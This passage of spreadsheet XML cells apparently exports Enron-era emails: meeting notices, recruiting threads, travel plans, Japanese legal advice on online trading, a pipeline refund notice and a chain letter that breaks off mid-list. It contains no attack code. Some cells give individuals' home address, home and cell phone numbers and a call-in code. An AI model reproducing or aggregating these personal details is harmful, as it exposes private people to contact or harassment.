    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: Buehler, Craig _x000D_
Sent: Monday, October 15, 2001 2:15 PM_x000D_
To: Dietz, Rick; Bodnar, Michael; Jones, Dana; Lohman, TK_x000D_
Subject: Osama Movie _x000D_
_x000D_
_x000D_
_x000D_
This is funny! Don't have your sound up too loud._x000D_
_x000D_
Click on the link below, then click "Watch this movie", then click "PLAY" after it loads._x000D_
_x000D_
_x000D_
_x000D_
http://www.newgrounds.com/portal/view.php?id=33641</t>
  </si>
  <si>
    <t>Wed, 21 Feb 2001 05:36:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Wes' Hot List Meeting</t>
  </si>
  <si>
    <t xml:space="preserve">Looks like a permanent cancellation to me - at least for now!  We can work _x000D_
with Wes on the best ways to stay abreast of developing deals that impact _x000D_
Enron Americas.  _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 02/21/2001 01:35 PM _x000D_
---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Michele Beffer @ ENRON                           02/21/2001 01:12 PM_x000D_
	_x000D_
_x000D_
To: Roger Ondreko/HOU/ECT@ECT, Cris Sherman/HOU/ECT@ECT, Stanley _x000D_
Farmer/Corp/Enron@ENRON, Herman Manis/Corp/Enron@ENRON, David _x000D_
Leboe/HOU/ECT@ECT, Drew Kanellopoulos/NA/Enron@Enron, Stephen H _x000D_
Douglas/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, Hope Vargas/HOU/ECT, Rodney _x000D_
Faldyn/Corp/Enron@Enron, Faith Killen/HOU/ECT@ECT, Georgeanne _x000D_
Hodges/HOU/ECT@ECT, Susan Helton/HOU/ECT@ECT, Joseph Deffner/HOU/ECT, Gail _x000D_
Tholen/HOU/ECT@ECT, Thomas Myers/HOU/ECT, Jim Coffey/HOU/ECT@ECT, Mark _x000D_
Lian/Corp/Enron@ENRON, Tammy R Shepperd/HOU/ECT@ECT, Bob M Hall/NA/Enron@Enron_x000D_
cc: Alisha Guerrero/HOU/ECT@ECT, Grace Taylor/Corp/Enron@ENRON, Patti _x000D_
Thompson/HOU/ECT@ECT, Paula Forsyth/Corp/Enron@ENRON, Shelley _x000D_
Grover/Corp/Enron@Enron, Megan Angelos/NA/Enron, Renee Ingram/HOU/ECT@ECT, _x000D_
Cindy Stokes/ENRON@enronXgate, Nicole Mendez/HOU/ECT, Lisa _x000D_
Lunz/Corp/Enron@ENRON, Kelly Ellis/Corp/Enron@Enron _x000D_
Subject: Wes' Hot List Meeting_x000D_
_x000D_
Please note that Wes Colwell's Bi-weekly Hot List meeting has been cancelled, _x000D_
please remove these meetings from your calendar.  If you have any questions, _x000D_
please feel free to call myself or Michele Beffer at ext. 57681.  FYI, the _x000D_
next meeting was scheduled for 2/22 at 1:30pm._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 25 Apr 2000 02:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'rmichaels@exchange.fullerton.edu', 'howard.fromer@enron.com', 'jeff.dasovich@enron.com'})</t>
  </si>
  <si>
    <t>AT&amp;T CALL IN NUMBER</t>
  </si>
  <si>
    <t>PARTICIPANTS: 888-422-7132          Code: 336601_x000D_
_x000D_
For assistance during the call, dial # and 0_x000D_
_x000D_
Howard, if anyone else from Enron would like to join us, just forward this _x000D_
message._x000D_
_x000D_
_x000D_
For some of you that wanted to see Joskow's paper, see_x000D_
_x000D_
http://web.mit.edu/pjoskow/www/RETAILV2.pdf</t>
  </si>
  <si>
    <t>Mon, 16 Jul 2001 10:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: RTO Orders - Grid South, SE Trans, SPP and Entergy</t>
  </si>
  <si>
    <t>Yep, you are still a junkie and the first to ask for these.       _x000D_
_x000D_
This next one RT01-100 is the ALJ order setting the mediation settlement conference, starting Tuesday, July 17._x000D_
_x000D_
 _x000D_
----- Forwarded by Donna Fulton/Corp/Enron on 07/16/2001 08:28 AM -----_x000D_
_x000D_
_x000D_
	Steven J Kean 07/14/2001 04:54 PM 	  To: Donna Fulton/Corp/Enron  cc:   Subject: Re: RTO Orders - Grid South, SE Trans, SPP and Entergy 	_x000D_
_x000D_
_x000D_
I'm still a junkie .... please email copies of the orders._x000D_
_x000D_
_x000D_
&lt;Embedded StdOleLink&gt;</t>
  </si>
  <si>
    <t>Thu, 18 Jan 2001 23:54:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">My sister was in town yesterday, so I took the day off.  _x000D_
_x000D_
Yes, let's.  When?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Alma Martinez@ENRON_x000D_
01/18/2001 07:55 AM_x000D_
To: Jeffrey A Shankman/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re:  _x000D_
_x000D_
Hey kid.  _x000D_
_x000D_
Let's get together soon.  _x000D_
_x000D_
Alma_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Oct 2000 05:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: ref from Randall Grace</t>
  </si>
  <si>
    <t xml:space="preserve">thanks for the email.  keep me updated on this.  Jeff_x000D_
_x000D_
_x000D_
From: Michele Nezi Marvin@ENRON COMMUNICATIONS on 09/29/2000 06:41 PM_x000D_
To: Jeffrey A Shankman/HOU/ECT@ECT@ENRON_x000D_
cc:  _x000D_
Subject: Re: ref from Randall Grace  _x000D_
_x000D_
My guess is that we'll bring him back for another round of interviews, so we _x000D_
can have you talk to him them. _x000D_
_x000D_
Michele Nezi Marvin_x000D_
Manager_x000D_
Enron Broadband Services_x000D_
(713)853-6848_x000D_
_x000D_
_x000D_
_x000D_
	Jeffrey A Shankman@ECT_x000D_
	09/28/00 04:42 PM_x000D_
		_x000D_
		 To: Michele Nezi Marvin/Enron Communications@ENRON COMMUNICATIONS@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re: ref from Randall Grace_x000D_
_x000D_
I'll be out til monday oct 2, I'll look at him them.  Jeff_x000D_
_x000D_
_x000D_
From: Michele Nezi Marvin@ENRON COMMUNICATIONS on 09/27/2000 05:15 PM_x000D_
To: Jeffrey A Shankman/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: ref from Randall Grace_x000D_
_x000D_
This was the guy that I mentioned that I was interviewing this Friday for the _x000D_
Associate program.  He was at Network Oil and seems to have a good _x000D_
background.  Let me know if you or someone else in your group would like to _x000D_
interview him._x000D_
_x000D_
 - cv5.doc_x000D_
_x000D_
Michele Nezi Marvin_x000D_
Manager_x000D_
Enron Broadband Services_x000D_
(713)853-6848_x000D_
----- Forwarded by Michele Nezi Marvin/Enron Communications on 09/27/00 05:13 _x000D_
PM -----_x000D_
_x000D_
	Celeste Roberts@ECT_x000D_
	09/18/00 04:29 PM_x000D_
		_x000D_
		 To: Michele Nezi Marvin/Enron Communications@ENRON COMMUNICATIONS@ENRON_x000D_
		 cc: _x000D_
		 Subject: Re: ref from Randall Grace_x000D_
_x000D_
I would wait.  Otherwise if we bring him in now and he gets offer, then we _x000D_
would have to place him elsewhere for his first six months.  If you want him _x000D_
for a first rotation, it may make sense to wait until we get closer to _x000D_
February._x000D_
_x000D_
_x000D_
From: Michele Nezi Marvin@ENRON COMMUNICATIONS on 09/18/2000 01:02 PM_x000D_
To: Celeste Roberts/HOU/ECT@ECT@ENRON_x000D_
cc: Kevin Howard/Enron Communications@Enron Communications, Sara _x000D_
Broughton/NA/Enron@ENRON _x000D_
Subject: Re: ref from Randall Grace  _x000D_
_x000D_
We will have a need for another associate in February and would be interested _x000D_
in evaluating Randall for that position.  Does that mean that we should wait _x000D_
a few months to interview him?  I don't think that Kevin has any immediate _x000D_
openings either._x000D_
_x000D_
Michele Nezi Marvin_x000D_
Manager_x000D_
Enron Broadband Services_x000D_
(713)853-6848_x000D_
_x000D_
_x000D_
_x000D_
	Celeste Roberts@ECT_x000D_
	09/15/00 07:57 PM_x000D_
		_x000D_
		 To: Michele Nezi Marvin/Enron Communications@ENRON COMMUNICATIONS@ENRON_x000D_
		 cc: Kevin Howard/Enron Communications@Enron Communications, Sara _x000D_
Broughton/NA/Enron@ENRON_x000D_
		 Subject: Re: ref from Randall Grace_x000D_
_x000D_
We can bring him in for a round of interviews for the Associate Program.  If _x000D_
you have an immediate need and he passes interviews then its likely we can _x000D_
make offer now.  Confirm thats what you want and we will facilitate getting _x000D_
him in for interviews._x000D_
_x000D_
Celeste_x000D_
_x000D_
_x000D_
From: Michele Nezi Marvin@ENRON COMMUNICATIONS on 09/13/2000 06:24 PM_x000D_
To: Celeste Roberts/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: ref from Randall Grace_x000D_
_x000D_
The attached resume comes highly recommended to us and it looks like he's got _x000D_
some very relevant experience to some of the things going on in EBS.  Kevin _x000D_
Howard and I would both be interested in talking to him about positions in _x000D_
our group, but it seems to make the most sense to bring him into the _x000D_
Associate/Analyst Program.  He's been out of school for 2 years and was one _x000D_
of the founders of Network Oil, a Houston based startup.  What is the best _x000D_
way to proceed with this?_x000D_
_x000D_
Michele Nezi Marvin_x000D_
Manager_x000D_
Enron Broadband Services_x000D_
(713)853-6848_x000D_
----- Forwarded by Michele Nezi Marvin/Enron Communications on 09/13/00 06:21 _x000D_
PM -----_x000D_
_x000D_
	Kevin Howard_x000D_
	09/13/00 06:13 PM_x000D_
		_x000D_
		 To: Michele Nezi Marvin/Enron Communications@Enron Communications_x000D_
		 cc: _x000D_
		 Subject: Re: ref from Randall Grace_x000D_
_x000D_
Please._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kevin_x000D_
_x000D_
_x000D_
_x000D_
	Michele Nezi Marvin_x000D_
	09/13/00 05:17 PM_x000D_
		_x000D_
		 To: Kevin Howard/Enron Communications@Enron Communications_x000D_
		 cc: _x000D_
		 Subject: Re: ref from Randall Grace_x000D_
That's a good idea.  If we get him in for interviewing, it would probably be _x000D_
a couple of months before he has an offer and starts - they'd probably just _x000D_
lump him in with the MBA recruiting and Super Saturday timing.  We'd _x000D_
definitely have an interest in talking to him about opportunities in our _x000D_
group to see if there is a fit.  Do you want me to work with the Associate _x000D_
program to try to make that happen?_x000D_
_x000D_
Michele Nezi Marvin_x000D_
Manager_x000D_
Enron Broadband Services_x000D_
(713)853-6848_x000D_
_x000D_
_x000D_
_x000D_
	Kevin Howard_x000D_
	09/13/00 04:38 PM_x000D_
		 _x000D_
		 To: Michele Nezi Marvin/Enron Communications@Enron Communications_x000D_
		 cc: _x000D_
		 Subject: Re: ref from Randall Grace_x000D_
_x000D_
_x000D_
Michelle:_x000D_
_x000D_
This would be as an associate in the EBS program.  I am full right now but _x000D_
seemed like someone we would want in the family.  Louie Fischer is very high _x000D_
on him and she is typically a tough critic.  If we could get him in for _x000D_
interviews, we could consider placement and timing._x000D_
_x000D_
Kevin----- Forwarded by Kevin Howard/Enron Communications on 09/13/00 04:40 _x000D_
PM -----_x000D_
_x000D_
	Luitgard Fischer_x000D_
	09/13/00 04:33 PM_x000D_
		_x000D_
		 To: Kevin Howard/Enron Communications@Enron Communications_x000D_
		 cc: _x000D_
		 Subject: Re: ref from Randall Grace_x000D_
_x000D_
Yes,  an associate role._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 13 Jul 1999 02:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Talisman Letter</t>
  </si>
  <si>
    <t>I just wanted to let you know that Shari Stack is working on that Talisman _x000D_
letter.  _x000D_
_x000D_
It was good talking to you, as always.  I hope you got out and "stomped" a _x000D_
little bit!</t>
  </si>
  <si>
    <t>Sun, 16 Apr 2000 15:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Detail of Commercial Support Analysts</t>
  </si>
  <si>
    <t xml:space="preserve">Sally - I am forwarding you the information I received from the Analyst _x000D_
Program which details the Analysts currently tagged as MSAP.  As you can see _x000D_
from Shelly's message below, she is working to clean up the data.  I hope _x000D_
this helps.  Since I will be at LSU tomorrow (Monday), I thought I would send _x000D_
this to you so you could print it out._x000D_
_x000D_
Lisa_x000D_
x3-6343_x000D_
---------------------- Forwarded by Lisa B Cousino/HOU/ECT on 04/16/2000 _x000D_
10:36 PM ---------------------------_x000D_
_x000D_
_x000D_
Shelly Jones_x000D_
04/14/2000 02:59 PM_x000D_
To: Lisa B Cousino/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Commercial Support Analysts_x000D_
_x000D_
Lisa, the attached report reflects 80 something analysts that have been _x000D_
identified as commercial support.  We are currently undergoing database clean _x000D_
up and have approx 70 analysts that have not been identified (commercial vs _x000D_
commercial support).  Once those analysts have been identified, which should _x000D_
happen early next week, I will forward yet another report your way._x000D_
_x000D_
I'll keep you posted._x000D_
Shelly_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 19 Dec 2001 07:07:55 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'liz.fricke@neg.pge.com'})</t>
  </si>
  <si>
    <t>RE: Travel arrangements for 12/12/2001 and 12/13/01</t>
  </si>
  <si>
    <t>Hi Rick,_x000D_
_x000D_
Per your voicemail yesterday, here is the information you requested:_x000D_
_x000D_
Tom Boren President &amp; Chief Executive Officer_x000D_
Chris Iribe President &amp; Chief Operating Officer, East Region_x000D_
_x000D_
Please let me know if you need anything else._x000D_
_x000D_
Have a wonderful holiday._x000D_
_x000D_
Liz Fricke_x000D_
_x000D_
-----Original Message-----_x000D_
From: Buy, Rick [mailto:Rick.Buy@ENRON.com]_x000D_
Sent: Friday, December 14, 2001 11:29 AM_x000D_
To: Fricke, Liz_x000D_
Subject: RE: Travel arrangements for 12/12/2001 and 12/13/01_x000D_
Sensitivity: Confidential_x000D_
_x000D_
_x000D_
Liz- Trip and dinner meeting went well. I have receipts for expenses so_x000D_
if you can tell me how to process I will. Thanks for all your help. Rick_x000D_
Buy_x000D_
_x000D_
-----Original Message-----_x000D_
From: Fricke, Liz [mailto:liz.fricke@neg.pge.com]_x000D_
Sent: Tuesday, December 11, 2001 3:54 PM_x000D_
To: Buy, Rick_x000D_
Subject: Travel arrangements for 12/12/2001 and 12/13/01_x000D_
Importance: High_x000D_
Sensitivity: Confidential_x000D_
_x000D_
_x000D_
Hi Rick,_x000D_
_x000D_
As promised, attached is your travel information.  At 6:30 tomorrow,_x000D_
please_x000D_
plan on meeting Lyn Maddox, Tom Boren, Chris Iribe and Tom King at 6:30_x000D_
Ruth_x000D_
Chris Steak House (301/652-7877)	7317 Wisconsin Ave., Bethesda._x000D_
In_x000D_
case you need it Lyn's cell phone number is (301) 704-6738.  Please let_x000D_
me_x000D_
know if you need anything else.  With respect to any expenses you incur_x000D_
I_x000D_
will e-mail you an expense reimbursement form. Please let me know if you_x000D_
have any additional questions._x000D_
_x000D_
Thank you_x000D_
Liz Fricke_x000D_
_x000D_
_x000D_
&gt; -----Original Message-----_x000D_
&gt; From:	mailer [mailto:mailer@adelmanmail.com]_x000D_
&gt; Sent:	Tuesday, December 11, 2001 3:32 PM_x000D_
&gt; To:	'liz.fricke@neg.pge.com'_x000D_
&gt; Subject:	Travel arrangements for Rick Buy traveling on 12/12/2001_x000D_
&gt; _x000D_
&gt;  &lt;&lt;Attachment&gt;&gt; _x000D_
_x000D_
_x000D_
PG&amp;E National Energy Group and any other_x000D_
company referenced herein that uses the PG&amp;E name or_x000D_
logo are not the same company as Pacific Gas and_x000D_
Electric Company, the regulated California utility.  Neither_x000D_
PG&amp;E National Energy Group nor these other_x000D_
referenced companies are regulated by the California Public_x000D_
Utilities Commission.  Customers of Pacific Gas and Electric Company_x000D_
do not have to buy products from these companies in order_x000D_
to continue to receive quality regulated services from the utility.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 _x000D_
**********************************************************************</t>
  </si>
  <si>
    <t>Mon, 11 Jun 2001 15:52:57 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'grace.kim@enron.com'})</t>
  </si>
  <si>
    <t>Algonquin gas prices</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Paul,_x000D_
_x000D_
This spreadsheet are the values you see in Metastock for Algonquin so the numbers might be better than what is in the heat rates spreadsheet.  Thank you,_x000D_
_x000D_
Grace Kim_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Fri, 12 May 2000 03:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron Online</t>
  </si>
  <si>
    <t xml:space="preserve">FYI._x000D_
_x000D_
I'll seek a clariification on what a statutory corporation is._x000D_
----- Forwarded by Alan Aronowitz/HOU/ECT on 05/12/2000 10:43 AM -----_x000D_
_x000D_
	Paul.TYO.Davis@BakerNet.com_x000D_
	05/12/2000 05:26 AM_x000D_
		 _x000D_
		 To: Alan.Aronowitz@enron.com, John.Viverito@enron.com_x000D_
		 cc: Shinji.Toyohara@BAKERNET.com, Jeremy.Pitts@BAKERNET.com_x000D_
		 Subject: Enron Online_x000D_
_x000D_
_x000D_
1. Products_x000D_
_x000D_
We confirm we do not consider it necessary for Enron to block Japanese users_x000D_
from dealing any of the products we understand are contemplated._x000D_
_x000D_
2. Customers_x000D_
_x000D_
Regarding the gambling issue, there is no problem in dealings with banks and_x000D_
insurance and securities companies because of the provisions in the relevant_x000D_
industry  laws._x000D_
_x000D_
With respect to other companies, there is a potential issue, the risk being _x000D_
less_x000D_
with companies of the type Enron has targeted in the First Wave of mailings, _x000D_
and_x000D_
greater if you respond to approaches from individuals or small companies._x000D_
_x000D_
We suggest that Enron take a reasonably conservative approach and seek to_x000D_
minimize the risk by:_x000D_
_x000D_
- including in the contract representations of the type discussed_x000D_
_x000D_
- the credit check process being used to exclude individuals, smaller _x000D_
companies_x000D_
and any other organization which appears not to meet the legitimate business_x000D_
test_x000D_
_x000D_
- possibly including a risk disclosure statement in the documentation (we have_x000D_
not had the chance to confirm if it contains one already)._x000D_
_x000D_
4.  Commodities Exchange Law_x000D_
_x000D_
Noting that kerosene for example is a product traded on a Japanese commodities_x000D_
exchange, we reconfirm that we do not see any problem in the online proposal_x000D_
insofar as it does not use prices quoted on the Japanese market._x000D_
_x000D_
From the facility viewpoint, we confirm our view that so long as Enron Japan_x000D_
does not become actively involved in the business, the proposal will not_x000D_
constitute a commodities facility in Japan._x000D_
_x000D_
5.  Counter party risks_x000D_
_x000D_
Your credit or other control procedures will need to take account of:_x000D_
_x000D_
(a) whether the transactions fall into the counter-party's business purposes, _x000D_
in_x000D_
the case of counter-parties other than banks and insurance companies and_x000D_
securities companies.  In this respect, non-companies and "statutory_x000D_
corporations" need to be dealt with particularly carefully.  The Japanese _x000D_
legal_x000D_
position is somewhat complicated and we would be happy to advise you further._x000D_
_x000D_
(b) the need for proper authorization and execution,  particularly of the_x000D_
initial application or terms and conditions._x000D_
_x000D_
(c)  netting - the situation differs between counterparties who are financial_x000D_
institutions and those who are not._x000D_
_x000D_
(d)  foreign exchange - for non-banks, ex post facto reporting will be _x000D_
required,_x000D_
depending upon the size of the transaction.  This obligation falls upon the_x000D_
customer, not Enron, and failure to report will not affect the validity of the_x000D_
transaction, but Enron should consider whether to inform customers of that _x000D_
this_x000D_
need may exist._x000D_
_x000D_
6.  Other_x000D_
_x000D_
We suggest that you/we closely monitor any changes to the role of EJ/EJM or_x000D_
changes in the structure of the online transactions_x000D_
_x000D_
We look forward in due course to receiving your instructions to commencing_x000D_
preparations for the moving of some of the functions onshore._x000D_
_x000D_
Regards_x000D_
_x000D_
------------------------------------------------------------------------------_x000D_
--_x000D_
--------_x000D_
This is an e-mail from Baker &amp; McKenzie - Tokyo Aoyama Law Office (Qualified_x000D_
Joint Enterprise Offices). The contents of this e-mail may be privileged and_x000D_
confidential and are intended only for the use of the addressee. No one else _x000D_
may_x000D_
copy, forward, disclose or use all or any of it in any form. If you are not an_x000D_
intended recipient, please notify us immediately (by reply e-mail) and delete_x000D_
this e-mail from your system. Thank you_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 7 Mar 2000 02:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Anurag</t>
  </si>
  <si>
    <t>Anurag Saksena_x000D_
Managing Director, Enterprise Risk_x000D_
GMAC - RFC_x000D_
8400 Normandale Lake Blvd._x000D_
Suite #600_x000D_
Minneapolis, Minnesota 55437_x000D_
Tel: (612) 857 - 6133 (o)_x000D_
Tel: (612) 943 - 8501 (h)_x000D_
10273 Antlers Ridge_x000D_
Eden Prairie, MN 55347_x000D_
ASaksen@rfc.com</t>
  </si>
  <si>
    <t>Sun, 8 Oct 2000 04:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'katherine.kelly@enron.com', 'brenda.fletcher@enron.com', 'judy.townsend@enron.com'})</t>
  </si>
  <si>
    <t>FW: Transco Files Motion For Modification of Settlement</t>
  </si>
  <si>
    <t xml:space="preserve">Refunds are always so much fun.  I suppose we would need to give some back to _x000D_
BUG if this happens._x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 10/08/2000 11:21 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Immer, Ingrid" &lt;Ingrid.Immer@Williams.com&gt; on 09/25/2000 10:42:54 AM_x000D_
To: "Brown, Daryl" &lt;Daryl.Brown@Williams.com&gt;, "Fiser, Michael" _x000D_
&lt;Michael.Fiser@Williams.com&gt;, "'jfoard@coral-energy.com'" _x000D_
&lt;jfoard@coral-energy.com&gt;, "'scalcagno@keyspanenergy.com'" _x000D_
&lt;scalcagno@keyspanenergy.com&gt;, "'eanderson@keyspanenergy.com'" _x000D_
&lt;eanderson@keyspanenergy.com&gt;, "'david.caffery@pseg.com'" _x000D_
&lt;david.caffery@pseg.com&gt;, "'rod.mullin@nypa.gov'" &lt;rod.mullin@nypa.gov&gt;, _x000D_
"'jtownse@enron.com'" &lt;jtownse@enron.com&gt;, "'cgerman@enron.com'" _x000D_
&lt;cgerman@enron.com&gt;, "'john.hodge@enron.com'" &lt;john.hodge@enron.com&gt;_x000D_
cc:  _x000D_
Subject: FW: Transco Files Motion For Modification of Settlement_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Just wanted to make sure all of you saw this notice that we posted on the _x000D_
bulletin board last week.? This may mean significant $$$ for some of you.? In _x000D_
brief, we are filing a request to make an early partial refund.? The refund _x000D_
is related to the rate of return settlement in our last rate filing.? _x000D_
According to the rate case proceedings, the refund is not due until a final _x000D_
non-appealable order is issued, but we are requesting permission to do a _x000D_
partial refund sooner (around Oct 31).? As the bulletin states, if your _x000D_
company wishes to wait to receive its full refund after the final, _x000D_
non-appealable order, please notify me or another Transco rep._x000D_
_x000D_
Happy Halloween.?? ii _x000D_
_x000D_
-----Original Message----- _x000D_
From:?? CustomerNotices, WGPHOU _x000D_
Sent:?? Friday, September 22, 2000 4:08 PM _x000D_
To:???? Alatorre, Hector; Alvarado, Orlando; Ambler, Margie; Anderson, Toi; _x000D_
Avioli, James; Blodgett, Kerry; Bowman, Terri; Buhrke, Cathy; Casey, Melissa; _x000D_
Catlett, Laurie; Conley, Allan; Cordray, Stan; Cortez, Diama; Cox, Ann; _x000D_
Doyle, Ronald; Eaton, John; Egner, Paul; Fitch, Terry; Flores, Gloria; _x000D_
Gallerano, John; Gensler, Quentin; Hargrove, Nancy; Heiser, Suzanne; Helburg, _x000D_
Charles; Higginbotham, Keith; Hungate, Cynthia; Immer, Ingrid; Kelley, James; _x000D_
Kelley, Nancy; King, Mable; Kleiner, Margaret; Laird, Mary; Laughlin, Helen; _x000D_
Laurel, Liz; Lindloff, Monty; Lobdell, Julie; Loggins, Kenneth; Lowrey, _x000D_
Roseanne; McCauley, Laurie; Mingen, Michele; Mott, Louella; Muenster, Kay; _x000D_
Nguyen, Michelle; Payne, Leon; Prevott, Rose; Prodoehl, Paul; Ramos, J Linda; _x000D_
Ramos, Mary; Roberts, Jan; Robertson, Constance; Rush, Russell; Sansom, _x000D_
William; Scott, Mark; Shaull, Barbara; Silvas, Elizabeth; Smith, Elsie; _x000D_
Stevens, Paula; Swanson, Debbe; Taormina, Victoria; Taylor, Charles; Taylor, _x000D_
Janice; Thornton, Suzanne; Wahlstrom, Scottie; Walleck, Lynn; Watson-Combre, _x000D_
Cassandra_x000D_
_x000D_
Subject:??????? Transco Files Motion For Modification of Settlement _x000D_
_x000D_
September 22, 2000 _x000D_
_x000D_
To:? Transcontinental Gas Pipe Line Corporation Customers and _x000D_
Shippers _x000D_
_x000D_
Re: Transco Files a Motion for Modification of Settlement to _x000D_
??? Permit Interim Partial Refunds _x000D_
??? Docket Nos. RP97-71-000 and RP97-312-000 _x000D_
_x000D_
In response to certain customers' requests, Transco submits a _x000D_
Motion for Modification of Settlement to Permit Interim Partial _x000D_
Refunds in the above-captioned proceedings. By this motion, _x000D_
Transco requests that the Commission modify Article V of the _x000D_
January 20, 1998 Stipulation and Agreement to permit Transco to _x000D_
make an interim partial refund of amount to Non-Contesting _x000D_
Parties, if any, related to the Capital Structure/Rate of Return _x000D_
Issues on or about October 31, 2000. The refund is being made to _x000D_
parties in advance of the date that such refunds are due as set _x000D_
forth in the Stipulation and Agreement, in part to help mitigate _x000D_
the effects of current high natural gas prices on their _x000D_
customers. For further detailed information of the Motion filed _x000D_
at the Federal Energy Regulatory Commission, please refer to _x000D_
Transco's filing today in the above mentioned dockets. _x000D_
_x000D_
Specifically, Transco proposes to make interim partial refunds on _x000D_
or about October 31,2000 to Non-Contesting Parties related to the _x000D_
Capital Structure/Rate of Return Issues. Transco will refund to _x000D_
those customers with interest from the date of payment to the _x000D_
date of refund, the amount, if any, collected from May 1, 1997 _x000D_
through February 29,2000 in excess of the amount that would have _x000D_
been collected under the Settlement Rates as adjusted by the _x000D_
Commission's findings in its March 17, 2000 order in Docket No. _x000D_
RP97-71-000 on the Capital Structure/Rate of Return Issues, _x000D_
subject to the "refund floor". These interim partial refunds will _x000D_
be made on a lump sum basis, and will not be accompanied by any _x000D_
supporting documentation. However, supporting documentation for _x000D_
the principal and the interest calculation will be available upon _x000D_
request. _x000D_
_x000D_
If a Non-Contesting Party does not wish to receive an interim _x000D_
partial refund, and wishes instead to await issuance of a final _x000D_
Commission order no longer subject to rehearing on the Capital _x000D_
Structure/Rate of Return issues prior to receiving any refunds _x000D_
related to those issues, Transco requests that such Non- _x000D_
Contesting Party notify its customer service representative, on _x000D_
or before October 25, 2000, of its election not to participate in _x000D_
the interim partial refunds. _x000D_
_x000D_
_x000D_
Stella Yu _x000D_
Manager of Rate and Tariff Implementation _x000D_
(713) 215-3381 _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 8 Dec 2000 04:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Eric Bass/HOU/ECT on 12/08/2000 12:56 PM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
"Larry W. Bass" &lt;lwbthemarine@bigplanet.com&gt; on 12/08/2000 12:48:35 PM_x000D_
To: KATHY BASS &lt;daphneco64@bigplanet.com&gt;, kb &lt;daphneco64@yahoo.com&gt;, jason _x000D_
&lt;jason.bass2@compaq.com&gt;, eric preston bass &lt;Eric.Bass@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Fw: (no subject)_x000D_
_x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: &lt;RMSSVS@aol.com&gt;_x000D_
To: &lt;blake_veal_2000@yahoo.com&gt;; &lt;CC0NN@aol.com&gt;; &lt;dldegen@flash.net&gt;;_x000D_
&lt;Janetgveal@aol.com&gt;; &lt;fundrzer@att.net&gt;; &lt;JOMcRae@aol.com&gt;;_x000D_
&lt;mgalloway2@austin.rr.com&gt;; &lt;melinda@corridor.net&gt;; &lt;Fhp217@aol.com&gt;_x000D_
Sent: Thursday, December 07, 2000 12:45 PM_x000D_
Subject: (no subject)_x000D_
_x000D_
_x000D_
&gt; In a message dated 12/7/00 9:58:03 AM Eastern Standard Time, Charnet222_x000D_
&gt; writes:_x000D_
&gt;_x000D_
&gt; &lt;&lt;_x000D_
&gt;  &lt;&lt; This is a simple way to a nice calm happy life!_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; This is nice reading, but short. Enjoy! This is_x000D_
&gt;   &gt; &gt; &gt; &gt; what_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; The Dalai Lama has to say on the millennium. All_x000D_
&gt;   &gt; &gt; &gt; &gt; it takes is a few_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; seconds to read and think it over. Do not keep_x000D_
&gt;   &gt; &gt; &gt; &gt; this message. The mantra_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; must leave our hands within 96hours. You will_x000D_
&gt;   &gt; &gt; &gt; get_x000D_
&gt;   &gt; &gt; &gt; &gt; a very pleasant_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; surprise. This is true even if you are not_x000D_
&gt;   &gt; &gt; &gt; &gt; superstitious._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; I N S T R U C T I O N S  F O R  L I F E_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 1. Take into account that great love and great_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; achievements involve great risk._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 2. When you lose, don't lose the lesson._x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt; 3. Follow the three R's:_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;       Respect for self_x000D_
&gt;   &gt; &gt; &gt; &gt; &gt;       Respect for others and_x000D_
